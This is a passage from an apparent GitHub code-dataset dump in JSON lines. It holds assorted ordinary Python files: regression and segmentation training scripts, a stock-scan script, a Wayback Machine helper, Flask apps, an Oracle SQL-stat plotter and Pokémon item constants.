\nprint(best_model)\n \n\n\n# degree 6 on test data\ntrain_6 = polynomial_dataframe(kc_house_train['sqft_living'], 6)\ntrain_6['price'] = kc_house_train['price']\nfeatures_6 = train_6.columns[:-1]\n\nmodel_6 = linear_model.LinearRegression()\nmodel_6.fit(train_6[features_6], train_6['price'])\n \ntest_6 = polynomial_dataframe(kc_house_test['sqft_living'], 6)\ntest_6['price'] = kc_house_test['price']\n\ntest_6_predictions = model_6.predict(test_6[features_6])\n \n# compute test 4 RSS\ntest_6_rss = sum((test_6_predictions - test_6['price'])**2)\nprint(test_6_rss)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"beckernick/machine_learning_prediction","sub_path":"housing_prices_prediction/model_tuning_algorithms.py","file_name":"model_tuning_algorithms.py","file_ext":"py","file_size_in_byte":7941,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"40312467526","text":"import datetime\n\nimport pandas as pd\nfrom pandas.compat import StringIO\n\nimport tushare as ts\n\nif __name__ == '__main__':\n now = datetime.datetime.now()\n today = str(now.date())\n\n sh = ts.get_hist_data('sh')\n filename = 'data/scan_big_bid/{}.csv'.format(sh.index[0] if sh.index[0] != today else sh.index[1])\n\n print(filename)\n text = open(filename, encoding='GBK').read()\n text = text.replace('--', '')\n df = pd.read_csv(StringIO(text), dtype={'code': 'object'})\n hist = df.set_index('code')\n # hist = hist.head(10)\n # hist = hist.tail(10)\n print(hist)\n\n all = ts.get_today_all()\n all_index = list(all['code'])\n filterd = pd.DataFrame()\n for i in range(len(hist)):\n index = all_index.index(hist.index[i])\n row = all.loc[index]\n if row['volume'] > 0:\n # print(row)\n row['url'] = hist['url'][i]\n row['prehigh'] = hist['high'][i]\n filterd = filterd.append(row)\n\n now = pd.DataFrame({'code': filterd['code']})\n now['name'] = filterd['name']\n now['prehigh'] = filterd['prehigh']\n now['settlement'] = filterd['settlement']\n now['open'] = filterd['open']\n now['openpercent'] = ((filterd['open'] - filterd['prehigh']) / filterd['prehigh'] * 100).round(3)\n now['changepercent'] = ((filterd['trade'] - filterd['prehigh']) / filterd['prehigh'] * 100).round(3)\n now['url'] = filterd['url']\n now = now.reset_index(drop=True)\n # now = now.sort_values('openpercent')\n now = now.sort_values('changepercent')\n\n open_positive = (now['openpercent'] > 0).sum() / len(now) * 100\n open_avg = now['openpercent'].mean()\n now_positive = (now['changepercent'] > 0).sum() / len(now) * 100\n now_avg = now['changepercent'].mean()\n\n print(now)\n print('open正收益概率:{}%'.format(round(open_positive, 2)))\n print('open综合收益:{}%'.format(round(open_avg, 2)))\n print('now正收益概率:{}%'.format(round(now_positive, 2)))\n print('now综合收益:{}%'.format(round(now_avg, 2)))\n","repo_name":"fswzb/analyze","sub_path":"watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37813788545","text":"import re\nfrom time import sleep\nfrom datetime import datetime\n\nimport waybackpy\n\nUSER_AGENT = \"Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0\"\n\n# get the nearest archived version to following date parameters\nYEAR = 2021\nMONTH = 1\nDAY = 1\nOLD_DATE = datetime(2018, 6, 1) # if archived version older than this, update\n\ndef get_archived(page_url, update_old=False, year=YEAR):\n try:\n waybackpy_url_obj = waybackpy.Url(page_url, USER_AGENT)\n archive_url_near = waybackpy_url_obj.near(year=year, month=MONTH, day=DAY)\n except waybackpy.exceptions.WaybackError as e:\n try: # try again\n sleep(5)\n waybackpy_url_obj = waybackpy.Url(page_url, USER_AGENT)\n archive_url_near = waybackpy_url_obj.near(year=year, month=MONTH, day=DAY)\n except waybackpy.exceptions.WaybackError as e:\n # print(e)\n print(' error in retrieving {} , using original url '.format(page_url))\n return page_url\n url_str = archive_url_near.archive_url\n if update_old:\n date = archive_url_near.timestamp\n if date < OLD_DATE:\n print('updating {}'.format(url_str, date))\n archive_url_near = update_archive(waybackpy_url_obj)\n if archive_url_near is None:\n print(' could not save page {}'.format(page_url))\n else:\n url_str = archive_url_near.archive_url\n print(' updated to {}'.format(url_str))\n url_str = url_str.replace(':80', '', 1)\n return url_str\n\n\ndef update_archive(waybackpy_url_obj):\n if isinstance(waybackpy_url_obj, str):\n waybackpy_url_obj = waybackpy.Url(waybackpy_url_obj, USER_AGENT)\n try:\n archive_obj = waybackpy_url_obj.save()\n except waybackpy.exceptions.WaybackError as e:\n print(e)\n return None\n return archive_obj\n\n\ndef get_orig_url(url):\n matches = re.split('(https?://)', url)\n return ''.join(matches[-2:])\n\n\nif __name__ == \"__main__\":\n print(get_archived('https://www.sparknotes.com/lit/#'))\n","repo_name":"manestay/novel-chapter-dataset","sub_path":"scraping/archive_lib.py","file_name":"archive_lib.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"39249815311","text":"from bs4 import BeautifulSoup\n\nfrom create_and_migrate_db import db, mxGraph_Cells_Table_Class,Cell_Id_And_Capacity_Table_Class\n\ndef Update_Database_Asynchronously_With_Latest_Map_XML_Backend(xml_data):\n\tsoup = BeautifulSoup(xml_data, 'xml')\n\tlist_of_all_cell_tags = soup.findAll('mxCell')\n\tlist_of_cell_types=[]\n\tlist_of_cell_ids=[]\n\tlist_of_cell_asset_type=[]\n\tlist_of_cell_source=[]\n\tlist_of_cell_target=[]\n\tfor cell_tag in list_of_all_cell_tags:\n\t\tif (cell_tag.get('vertex')) is not None:\n\t\t\tvertex_or_edge='vertex'\n\t\t\tcell_tag_id=cell_tag.get('id')\n\t\t\tasset_type=cell_tag.get('value')\n\t\t\tfake_source='FN_in_'+str(cell_tag_id)\n\t\t\tfake_target='FN_out_'+str(cell_tag_id)\n\t\telif (cell_tag.get('edge')) is not None:\n\t\t\tvertex_or_edge='edge'\n\t\t\tcell_tag_id=cell_tag.get('id')\n\t\t\tasset_type=cell_tag.get('value')\n\t\t\treal_source=cell_tag.get('source')\n\t\t\treal_target=cell_tag.get('target')\n\t\t\tfake_source='FN_out_'+str(real_source)\n\t\t\tfake_target='FN_in_'+str(real_target)\n\t\telse:\n\t\t\tcontinue\n\t\tlist_of_cell_types.append(vertex_or_edge)\n\t\tlist_of_cell_ids.append(cell_tag_id)\n\t\tlist_of_cell_asset_type.append(asset_type)\n\t\tlist_of_cell_source.append(fake_source)\n\t\tlist_of_cell_target.append(fake_target)\n\n\tlist_of_lists_zip=zip(list_of_cell_ids,list_of_cell_asset_type,list_of_cell_types,list_of_cell_source,list_of_cell_target)\n\tDelete_Rows_Of_mxGraph_Tables_In_Database(db=db)\n\tUpdate_mxGraph_Tables_In_Database(db=db,list_of_lists_zip=list_of_lists_zip)\n\t#return christ\n\ndef Delete_Rows_Of_mxGraph_Tables_In_Database(db):\n\tmxGraph_Cells_Table_Class.query.delete()\n\tdb.session.commit()\n\ndef Update_mxGraph_Tables_In_Database(db,list_of_lists_zip):\n\tfor cell_id, asset_type, cell_type, cell_source, cell_target in list_of_lists_zip:\n\t\tcell_object_to_add=mxGraph_Cells_Table_Class(\n\t\t\tcell_id=cell_id,\n\t\t\tvertex_or_edge=cell_type,\n\t\t\tasset_type=asset_type,\n\t\t\tsource=cell_source,\n\t\t\ttarget=cell_target\n\t\t)\n\t\tdb.session.add(cell_object_to_add)\n\t\t#specific_cell_database_object=mxGraph_Cells_Table_Class.query.filter(mxGraph_Cells_Table_Class.cell_id==cell_id).first()\n\t\tdb.session.commit()\n\t\t#updating or adding tuples in Cell_Id_And_Capacity_Table_Class\n\t\tspecific_cell_id_and_capacity_table_object=Cell_Id_And_Capacity_Table_Class.query.filter(Cell_Id_And_Capacity_Table_Class.cell_id==cell_id).first()\n\t\tif specific_cell_id_and_capacity_table_object is None:\n\t\t\tcell_object_to_add=Cell_Id_And_Capacity_Table_Class(\n\t\t\t\tcell_id=cell_id)\n\t\t\tdb.session.add(cell_object_to_add)\n\t\t\tdb.session.commit()\n\n\n\n\n\t\n","repo_name":"chuazhang/dop","sub_path":"custom_libraries/map_page_libraries/update_database_asynchronously_with_latest_map_xml_backend.py","file_name":"update_database_asynchronously_with_latest_map_xml_backend.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40701845090","text":"import argparse\nimport main\nimport sys\nfrom main import TurtleWallet\n\ndef new_wallet(name):\n main.new_wallet(name)\n\ndef access_wallet(name):\n return main.access_wallet(name)\n\ndef list_wallets():\n main.list_wallets()\n\n\"python cli.py --wallet\"\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--wallet\", action=\"store_true\")\nparser.add_argument(\"--transact\", action=\"store_true\")\nargs = parser.parse_args()\nif args.wallet:\n print(\"Enter wallet name:\")\n name = input()\n wallet = access_wallet(name)\n if not wallet:\n print(f\"A wallet with that name does not exist. Do you wish to create one?\")\n while True:\n print(\"type 'yes' or 'no':\")\n create_new = input()\n if create_new == 'yes':\n print(f\"creating wallet with name {name}\")\n new_wallet(name)\n wallet = access_wallet(name)\n break\n elif create_new == 'no':\n sys.exit()\n print(\"wallet created\")\n else:\n print(\"wallet restored\")\n\n\n #now do stuff with wallet?\n #add address\n # do you want to create a new address?\n sys.exit() #until I fix / implement the next part\n\n #wallet.list_addressses() # lists public addresses\n print(\"Do you want to create a new address\")\n while True:\n print(\"type 'yes' or 'no':\")\n new_address = input()\n if new_address == 'yes':\n # something about this one bugs me.\n addr = wallet.generate_new_child_private_public_address()\nif args.list_wallets:\n list_wallets()\nif args.transact:\n print(\"creating transaction, you will enter your wallet name\")\n print(\"Enter the name of your wallet:\")\n wallet = input()\n print(f\"Wallet name is {wallet}\")\n print(\"Enter amount in Eth:\")\n value = input()\n print(f\"value is {value}\")\n print(f\"Enter destination address:\")\n to_address = input()\n print(f\"destination address is {to_address}\")\n\n print(\"Verify the following information is correct: \")\n print(\"value: \", value, \" destination: \", to_address)\n print(\"Do you wish to proceed with the transaction? Type 'Yes' to proceed, 'No' to cancel\")\n proceed = input()\n if proceed == \"Yes\":\n\n pass\n # do transaction\n","repo_name":"bschwyn/Wallet","sub_path":"cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37735399175","text":"\nimport enter as en\nimport logger\nimport view\n\n\ndef start():\n button = view.choice()\n if button == 1:\n print('Вносите абонент')\n contact = en.enter()\n logger.log_to_file(contact)\n start()\n if button == 2:\n print('Работа окончена')\n exit","repo_name":"LenaLemesheva/Python","sub_path":"Семинары/Домашние задания/17.10.2022/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32277550509","text":"import os\nimport re\nimport sys\nfrom one.api import ONE\nfrom brainwidemap.decoding.settings import SLURM_DIR\n\none = ONE()\njob_name = sys.argv[1]\n\nfs = [f for f in os.listdir(SLURM_DIR) if re.match(job_name + \".*err\", f)]\nfs_out = [f for f in os.listdir(SLURM_DIR) if re.match(job_name + \".*out\", f)]\nprint(f'found {len(fs)} matching error files in SLURM_DIR')\nprint(f'found {len(fs_out)} matching output files in SLURM_DIR')\n\ncancel_files = []\nfor f in fs:\n with open(SLURM_DIR.joinpath(f), \"r\") as fo:\n s = fo.read().replace(\"\\n\", \"\")\n if re.match(\".*CANCELLED.*\", s):\n cancel_files.append(f)\n\nspikesort_fail_eids = []\ntrial_fail_eids = []\nfor f in fs_out:\n with open(SLURM_DIR.joinpath(f), \"r\") as fo:\n s = fo.read().replace(\"\\n\",\"\")\n matches = re.finditer(\"Downloading failed for spike sorting data\", s)\n for match in matches:\n end_index = match.end()\n spikesort_fail_eids.append(f'eid {one.pid2eid(s[end_index+6:end_index+42])[0]}')\n matches = re.finditer(\"Downloading failed for trials data\", s)\n for match in matches:\n end_index = match.end()\n trial_fail_eids.append(s[end_index+2:end_index+42])\n\nprint(\"Cancelled files:\")\nprint('\\n'.join(cancel_files))\nprint(\"Downloading failed for spike sorting:\")\nprint('\\n'.join(spikesort_fail_eids))\nprint(\"Downloading failed for trial data:\")\nprint('\\n'.join(trial_fail_eids))\n","repo_name":"int-brain-lab/paper-brain-wide-map","sub_path":"brainwidemap/decoding/00b_check_download.py","file_name":"00b_check_download.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"4440905963","text":"from command.base import BaseCommand\r\nfrom config import Config\r\nfrom context.paymentcalculator import EmployeePayroll\r\n\r\n\r\nclass CalculatePayrollCommand(BaseCommand):\r\n\r\n def __init__(self, context):\r\n self.context = context\r\n\r\n def execute(self):\r\n for employee_time_sheet in self.context.time_sheet_list:\r\n amount = self.calculate_amount(employee_time_sheet.time_sheet)\r\n self.context.payroll_list.append(\r\n EmployeePayroll(employee_time_sheet.name, amount)\r\n )\r\n\r\n def calculate_amount(self, time_sheet):\r\n return sum(self.calculate_day(work_day) for work_day in time_sheet)\r\n\r\n def calculate_day(self, work_day):\r\n base = Config.WEEKDAY_BASE\r\n if work_day.dotw in ['SA', 'SU']:\r\n base = Config.WEEKEND_BASE\r\n\r\n day_hours = evening_hours = overnight_hours = 0\r\n for hour in range(work_day.start, work_day.end):\r\n if hour < 9:\r\n overnight_hours += 1\r\n elif hour < 18:\r\n day_hours += 1\r\n else:\r\n evening_hours += 1\r\n\r\n return day_hours * base \\\r\n + evening_hours * (base + Config.EVENING_EXTRA) \\\r\n + overnight_hours * (base + Config.OVERNIGHT_EXTRA)\r\n","repo_name":"felipenehmi/payment-calculator","sub_path":"paymentcalculator/command/calculatepayrollcommand.py","file_name":"calculatepayrollcommand.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74905401745","text":"# 팩토리얼\n# 예제 5번 / 2가지 방식으로 구현한 팩토리얼 예제\n\n# 반복적으로 구현\ndef factorial_iterative(n):\n sum = 1\n for i in range (n):\n sum *= i+1\n return sum\n\nprint(factorial_iterative(5))\n\n# 재귀적으로 구현\n\ndef factorial_recursive(n):\n if n > 1:\n return n * factorial_recursive(n-1)\n elif n <= 1:\n return 1\n\nprint(factorial_recursive(5))\n","repo_name":"limnyn/python_codingtest","sub_path":"codingtest/5-5_팩토리얼.py","file_name":"5-5_팩토리얼.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5395048960","text":"from tensorflow.keras.callbacks import ModelCheckpoint, LearningRateScheduler, EarlyStopping, ReduceLROnPlateau\nfrom IPython.display import clear_output\nfrom keras.optimizers import Adam\nimport numpy as np\nfrom src.train_split_lung import StanderizeVarible\nfrom sklearn.model_selection import train_test_split\nfrom src.train_split_lung import ChooseModel\nfrom src.utils.metrics import dice_coef, dice_coef_loss\nfrom src.utils.PlotMask import PlotTest, PlotMetric\n\nweight_path=\"{}_weights.best.hdf5\".format('cxr_reg')\n\ncheckpoint = ModelCheckpoint(weight_path, monitor='val_loss', verbose=1, \n save_best_only=True, mode='min', save_weights_only = True)\n\nreduceLROnPlat = ReduceLROnPlateau(monitor='val_loss', factor=0.5, \n patience=3, \n verbose=1, mode='min', epsilon=0.0001, cooldown=2, min_lr=1e-6)\nearly = EarlyStopping(monitor=\"val_loss\", \n mode=\"min\", \n patience=15) # probably needs to be more patient, but kaggle time is limited\ncallbacks_list = [checkpoint, early, reduceLROnPlat]\n\n\nimages, mask = StanderizeVarible()\n\nmodel = ChooseModel()\nmodel.compile(optimizer=Adam(lr=2e-4), \n loss=[dice_coef_loss], \n metrics = [dice_coef, 'binary_accuracy'])\n\ntrain_vol, validation_vol, train_seg, validation_seg = train_test_split((images-127.0)/127.0, \n (mask>127).astype(np.float32), \n test_size = 0.1,random_state = 2018)\n\ntrain_vol, test_vol, train_seg, test_seg = train_test_split(train_vol,train_seg, \n test_size = 0.1, \n random_state = 2018)\n\nloss_history = model.fit(x = train_vol,\n y = train_seg,\n batch_size = 16,\n epochs = 50,\n validation_data =(test_vol,test_seg) ,\n callbacks=callbacks_list)\n\n\nclear_output()\nPlotMetric(loss_history= loss_history)\nPlotTest(validation_vol= validation_vol, model= model, validation_seg= validation_seg)","repo_name":"christopherohit/Preprocessing-MedicalImage","sub_path":"src/train_non_save_architechture.py","file_name":"train_non_save_architechture.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7941448756","text":"from flask import Flask, render_template, request, jsonify\nfrom flask_cors import CORS,cross_origin\nimport numpy as np\nimport pandas as pd\nfrom pickle import load\n\napp=Flask(__name__)\n\ndef preprocess(df):\n train_set = pd.read_csv('train_data.csv')\n train_set['workclass']=np.where(train_set['workclass']==' Without-pay',' Never-worked',train_set['workclass'])\n train_set['workclass']=np.where(train_set['workclass']==' ?',train_set['workclass'].mode(),train_set['workclass'])\n train_set['occupation']=np.where(train_set['occupation']==' ?',train_set['occupation'].mode(),train_set['occupation']) \n col_labels = ['age', 'workclass', 'fnlwgt', 'education_num','marital_status', 'occupation','relationship', 'race', 'sex', 'capital_gain','capital_loss', 'hours_per_week', 'native_country']\n scaler=load(open('scaler.pkl','rb'))\n df=pd.DataFrame(df,columns=col_labels)\n fq = train_set.groupby('workclass').size()/len(train_set)\n df['workclass']=df['workclass'].map(fq)\n fq=train_set.groupby('marital_status').size()/len(train_set)\n df['marital_status']=df['marital_status'].map(fq)\n fq=train_set.groupby('occupation').size()/len(train_set)\n df['occupation']=df['occupation'].map(fq)\n fq=train_set.groupby('relationship').size()/len(train_set)\n df['relationship']=df['relationship'].map(fq)\n fq=train_set.groupby('race').size()/len(train_set)\n df['race']=df['race'].map(fq)\n df['sex']=np.where(df['sex']==' Male',0,1)\n df['native_country']=np.where(df['native_country']==' United-States',1,0)\n df=scaler.transform(df)\n df=pd.DataFrame(df,columns=col_labels)\n return(df)\n\n@app.route('/',methods=['GET'])\n@cross_origin()\ndef homePage():\n return render_template(\"index.html\")\n\n@app.route('/predict',methods=['GET','POST'])\n@cross_origin()\ndef index():\n try:\n age=float(request.form['age'])\n wrkcls=str(request.form['wrkcls'])\n fnlwgt=float(request.form['fnlwgt'])\n education_num=str(request.form['education_num'])\n marital_status=str(request.form['marital_status'])\n occupation=str(request.form['occupation'])\n relationship=str(request.form['relationship'])\n race=str(request.form['race'])\n sex=str(request.form['sex'])\n cap_gain=float(request.form['cap_gain'])\n cap_loss=float(request.form['cap_loss'])\n hourspweek=float(request.form['hourspweek'])\n native_count=str(request.form['native_count'])\n final_arr=np.array([[age, wrkcls, fnlwgt, education_num, marital_status, occupation,relationship, race, sex, cap_gain, cap_loss,hourspweek, native_count]])\n model=load(open('model.pkl','rb'))\n prediction=model.predict(preprocess(final_arr))\n if prediction[0]==0:\n prediction=\"less than $50K.\"\n else:\n prediction=\"more than $50K.\"\n return render_template('results.html',prediction=prediction)\n except Exception as e:\n print('The Exception message is: ',e)\n return 'Something went Wrong. Go back and try again.'\n\n\nif __name__==\"__main__\":\n app.run(debug=True)","repo_name":"shiv0112/income-prediction-xgboost","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41140323160","text":"import logging\nlogging.basicConfig(level=logging.DEBUG)\n\ncommand = input(\"Co chciałbyś zrobić? \")\nif command in (\"exit\"):\n if command == \"exit\":\n logging.info(\"Dzięki wielkie, do zobaczenia!\")\n exit()\n\nitems = {\"kebab\", \"pizza\", \"makaron\", \"burger\"}","repo_name":"Kacperek32/Magazyn","sub_path":"magazyn.py","file_name":"magazyn.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4830283456","text":"import myplot\nimport util\n\ndef simplesqlstat(sql_id,start_time,end_time,instance_number):\n q_string = \"\"\"\nselect \nEND_INTERVAL_TIME,\nexecutions_delta,\nELAPSED_TIME_DELTA/(nonzeroexecutions*1000) ELAPSED_AVG_MS\nfrom \n(\nselect \nss.snap_id,\nss.sql_id,\nss.plan_hash_value,\nsn.END_INTERVAL_TIME,\nss.executions_delta,\ncase ss.executions_delta when 0 then 1 else ss.executions_delta end nonzeroexecutions,\nELAPSED_TIME_DELTA\nfrom\nDBA_HIST_SQLSTAT ss,DBA_HIST_SNAPSHOT sn\nwhere ss.sql_id = '\"\"\" \n q_string += sql_id\n q_string += \"\"\"'\nand ss.snap_id=sn.snap_id\nand ss.INSTANCE_NUMBER = \"\"\"\n q_string += instance_number\n q_string += \"\"\"\nand ss.INSTANCE_NUMBER=sn.INSTANCE_NUMBER and\nEND_INTERVAL_TIME \nbetween \nto_date('\"\"\" \n q_string += start_time\n q_string += \"\"\"','DD-MON-YYYY HH24:MI:SS')\nand \nto_date('\"\"\"\n q_string += end_time\n q_string += \"\"\"','DD-MON-YYYY HH24:MI:SS')\n)\norder by snap_id,sql_id\"\"\"\n return q_string\n\ndatabase,dbconnection = util.script_startup('Run statistics for one SQL id')\n\nstart_time=util.input_with_default('Start date and time (DD-MON-YYYY HH24:MI:SS)','01-JAN-1900 12:00:00')\n\nend_time=util.input_with_default('End date and time (DD-MON-YYYY HH24:MI:SS)','01-JAN-2200 12:00:00')\n\ninstance_number=util.input_with_default('Database Instance (1 if not RAC)','1')\n\n# Get user input\n\nsql_id=util.input_with_default('SQL_ID','acrg0q0qtx3gr')\n\nq = simplesqlstat(sql_id,start_time,end_time,instance_number);\n\nr = dbconnection.run_return_flipped_results(q)\n\n# plot query\n \nmyplot.title = \"Sql_id \"+sql_id+\" on \"+database+\" database, instance \"+instance_number\nmyplot.ylabel1 = \"Number of executions\"\nmyplot.ylabel2 = \"Averaged Elapsed Milliseconds\"\n\nutil.exit_no_results(r)\n\nmyplot.xdatetimes = r[0]\nmyplot.ylists = r[1:]\n\nmyplot.line_2subplots()","repo_name":"bobbydurrett/PythonDBAGraphs","sub_path":"simplesqlstat.py","file_name":"simplesqlstat.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"48"} +{"seq_id":"2572020452","text":"from models import app, db, Country, Disaster, Organization\nfrom schemas import (\n DisasterSchema,\n DisasterInstanceSchema,\n CountrySchema,\n CountryInstanceSchema,\n OrganizationSchema,\n OrganizationInstanceSchema,\n country_schema,\n disaster_schema,\n organization_schema,\n)\nimport flask_sqlalchemy\nfrom sqlalchemy import or_\nfrom query_finder import *\n\n\ndef search_organizations(query, q):\n if q == None:\n return query\n\n queries = q.split(\" \")\n print(queries)\n\n items = []\n for item in queries:\n items.append(Organization.name.ilike(\"%{}%\".format(item)))\n try:\n items.append(Organization.score.in_([int(item)]))\n except ValueError:\n pass\n try:\n items.append(Organization.rating.in_([int(item)]))\n except ValueError:\n pass\n items.append(Organization.category.ilike(\"%{}%\".format(item)))\n items.append(Organization.cause.ilike(\"%{}%\".format(item)))\n\n query = query.filter(or_(*tuple(items)))\n return query\n\n\ndef filter_organizations(query, queries):\n cause = get_query(\"cause\", queries)\n rating = get_query(\"rating\", queries)\n\n if cause != None:\n query = query.filter(Organization.cause.in_(cause))\n\n if rating != None:\n query = query.filter(Organization.rating.in_(rating))\n\n return query\n\n\ndef sort_organizations(sort, query):\n # sort = sort.split(\"-\")\n\n category = None\n if sort == \"name\":\n category = Organization.name\n elif sort == \"income\":\n category = Organization.income\n elif sort == \"score\":\n category = Organization.score\n else:\n category = Organization.id\n\n return query.order_by(category)\n","repo_name":"amodica/Diminishing-Disasters","sub_path":"backend/Organization.py","file_name":"Organization.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4815103930","text":"LEEK = 'Leek'\r\nREPEL = 'Repel'\r\nSUPER_REPEL = 'Super_Repel'\r\nMAX_REPEL = 'Max_Repel'\r\nBLACK_FLUTE = 'Black_Flute'\r\nWHITE_FLUTE = 'White_Flute'\r\nHONEY = 'Honey'\r\nESCAPE_ROPE = 'Escape_Rope'\r\nRED_SHARD = 'Red_Shard'\r\nYELLOW_SHARD = 'Yellow_Shard'\r\nBLUE_SHARD = 'Blue_Shard'\r\nGREEN_SHARD = 'Green_Shard'\r\nFIRE_STONE = 'Fire_Stone'\r\nTHUNDER_STONE = 'Thunder_Stone'\r\nWATER_STONE = 'Water_Stone'\r\nLEAF_STONE = 'Leaf_Stone'\r\nMOON_STONE = 'Moon_Stone'\r\nSUN_STONE = 'Sun_Stone'\r\nDUSK_STONE = 'Dusk_Stone'\r\nDAWN_STONE = 'Dawn_Stone'\r\nSHINY_STONE = 'Shiny_Stone'\r\nRED_APRICORN = 'Red_Apricorn'\r\nYELLOW_APRICORN = 'Yellow_Apricorn'\r\nBLUE_APRICORN = 'Blue_Apricorn'\r\nGREEN_APRICORN = 'Green_Apricorn'\r\nPINK_APRICORN = 'Pink_Apricorn'\r\nWHITE_APRICORN = 'White_Apricorn'\r\nBLACK_APRICORN = 'Black_Apricorn'\r\nHELIX_FOSSIL = 'Helix_Fossil'\r\nDOME_FOSSIL = 'Dome_Fossil'\r\nOLD_AMBER = 'Old_Amber'\r\nROOT_FOSSIL = 'Root_Fossil'\r\nCLAW_FOSSIL = 'Claw_Fossil'\r\nSKULL_FOSSIL = 'Skull_Fossil'\r\nARMOR_FOSSIL = 'Armor_Fossil'\r\nCOVER_FOSSIL = 'Cover_Fossil'\r\nPLUME_FOSSIL = 'Plume_Fossil'\r\nPRETTY_WING = 'Pretty_Wing'\r\nTINY_MUSHROOM = 'Tiny_Mushroom'\r\nBIG_MUSHROOM = 'Big_Mushroom'\r\nBALM_MUSHROOM = 'Balm_Mushroom'\r\nPEARL = 'Pearl'\r\nBIG_PEARL = 'Big_Pearl'\r\nPEARL_STRING = 'Pearl_String'\r\nSTARDUST = 'Stardust'\r\nSTAR_PIECE = 'Star_Piece'\r\nCOMET_SHARD = 'Comet_Shard'\r\nNUGGET = 'Nugget'\r\nBIG_NUGGET = 'Big_Nugget'\r\nHEART_SCALE = 'Heart_Scale'\r\nSLOWPOKE_TAIL = 'Slowpoke_Tail'\r\nRARE_BONE = 'Rare_Bone'\r\nRELIC_COPPER = 'Relic_Copper'\r\nRELIC_SILVER = 'Relic_Silver'\r\nRELIC_GOLD = 'Relic_Gold'\r\nRELIC_VASE = 'Relic_Vase'\r\nRELIC_BAND = 'Relic_Band'\r\nRELIC_STATUE = 'Relic_Statue'\r\nRELIC_CROWN = 'Relic_Crown'\r\nGROWTH_MULCH = 'Growth_Mulch'\r\nDAMP_MULCH = 'Damp_Mulch'\r\nSTABLE_MULCH = 'Stable_Mulch'\r\nGOOEY_MULCH = 'Gooey_Mulch'\r\nSHOAL_SALT = 'Shoal_Salt'\r\nSHOAL_SHELL = 'Shoal_Shell'\r\nODD_KEYSTONE = 'Odd_Keystone'\r\nAIR_BALLOON = 'Air_Balloon'\r\nBRIGHT_POWDER = 'Bright_Powder'\r\nEVIOLITE = 'Eviolite'\r\nFLOAT_STONE = 'Float_Stone'\r\nDESTINY_KNOT = 'Destiny_Knot'\r\nROCKY_HELMET = 'Rocky_Helmet'\r\nEJECT_BUTTON = 'Eject_Button'\r\nRED_CARD = 'Red_Card'\r\nSHED_SHELL = 'Shed_Shell'\r\nSMOKE_BALL = 'Smoke_Ball'\r\nLUCKY_EGG = 'Lucky_Egg'\r\nEXP_SHARE = 'Exp_Share'\r\nAMULET_COIN = 'Amulet_Coin'\r\nSOOTHE_BELL = 'Soothe_Bell'\r\nCLEANSE_TAG = 'Cleanse_Tag'\r\nCHOICE_BAND = 'Choice_Band'\r\nCHOICE_SPECS = 'Choice_Specs'\r\nCHOICE_SCARF = 'Choice_Scarf'\r\nHEAT_ROCK = 'Heat_Rock'\r\nDAMP_ROCK = 'Damp_Rock'\r\nSMOOTH_ROCK = 'Smooth_Rock'\r\nICY_ROCK = 'Icy_Rock'\r\nLIGHT_CLAY = 'Light_Clay'\r\nGRIP_CLAW = 'Grip_Claw'\r\nBINDING_BAND = 'Binding_Band'\r\nBIG_ROOT = 'Big_Root'\r\nBLACK_SLUDGE = 'Black_Sludge'\r\nLEFTOVERS = 'Leftovers'\r\nSHELL_BELL = 'Shell_Bell'\r\nMENTAL_HERB = 'Mental_Herb'\r\nWHITE_HERB = 'White_Herb'\r\nPOWER_HERB = 'Power_Herb'\r\nABSORB_BULB = 'Absorb_Bulb'\r\nCELL_BATTERY = 'Cell_Battery'\r\nLIFE_ORB = 'Life_Orb'\r\nEXPERT_BELT = 'Expert_Belt'\r\nMETRONOME = 'Metronome'\r\nMUSCLE_BAND = 'Muscle_Band'\r\nWISE_GLASSES = 'Wise_Glasses'\r\nRAZOR_CLAW = 'Razor_Claw'\r\nSCOPE_LENS = 'Scope_Lens'\r\nWIDE_LENS = 'Wide_Lens'\r\nZOOM_LENS = 'Zoom_Lens'\r\nKINGS_ROCK = 'Kings_Rock'\r\nRAZOR_FANG = 'Razor_Fang'\r\nLAGGING_TAIL = 'Lagging_Tail'\r\nQUICK_CLAW = 'Quick_Claw'\r\nFOCUS_BAND = 'Focus_Band'\r\nFOCUS_SASH = 